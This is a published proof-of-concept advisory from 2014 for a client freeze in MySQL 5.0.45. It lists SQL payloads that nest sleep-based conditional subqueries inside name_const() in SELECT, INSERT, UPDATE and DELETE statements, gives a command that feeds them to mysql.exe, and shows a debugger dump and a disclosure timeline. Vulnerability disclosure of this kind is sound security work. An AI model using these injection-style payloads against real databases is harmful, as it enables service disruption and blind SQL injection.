facebook facebook twitter rss

MySQL 5.0.45 Client Crash POC

Author: Osanda Malith Jayathissa , Published: 09-10-2014
# Exploit Title: MySQL 5.0.45 Client Crash POC
# Date: October 8th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osanda<[at]>unseen.com
# Version: mysql Ver 14.12 Distrib 5.0.45, for Win32 (ia32)
# Vendor Homepage: http://www.mysql.com/
# Tested on: Windows 8 64-bit

[-] Details
--------------

This is a small crash I found in MySQL 5.0.45 in the name_const function. I've tested this in a Windows 8 environment.
However this function won't allow performing select queries in latest versions. In older versions greater than or equal to 5.0.12 you can reproduce
this issue. I fuzzed the name_const() function and I noticed that when performing a conditional statement inside a sub query we can make the MySQL application freeze.
Once we press ^c twice we get the error message and the mysql.exe process will terminate.

[-] PoC
--------------

You can reproduce this crash by using SELECT, INSERT, UPDATE and DELETE statements with the name_const function

[+] select 1 and 1=(select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a);
[+] insert into users values (20 ,'foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '','bar');
[+] update users set password='foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '' where id=2;
[+] delete from users where id=2 and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a);

- You can also write this payload to a new file named payload.sql and pass it to MySQL

select 1 and 1=(select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a);

mysql.exe -u root -p < payload.sql

[-] Error Code (0x40010005) starting at KERNELBASE!PathCchAddExtension+0x000000000000eeb4 (Hash=0xd874d776.0xeb23281d)
----------------------------------------------------------------------------------------------------------------------

eax=09a6ff18 ebx=00000000 ecx=a6630000 edx=00000000 esi=00000000 edi=fffffffe
eip=75388172 esp=09a6fefc ebp=09a6ff84 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
KERNELBASE!PathCchAddExtension+0xeeb4:
75388172 897dfc mov dword ptr [ebp-4],edi ss:002b:09a6ff80=00000000

[-] Disclosure Timeline
------------------------

2014-05-13: Responsibly disclosed to Oracle.
2014-09-29: Receives a response saying MySQL 5.0 is not officially supported and does not get patches anymore.
2014-10-08: Public disclosure.

Like us on Facebook :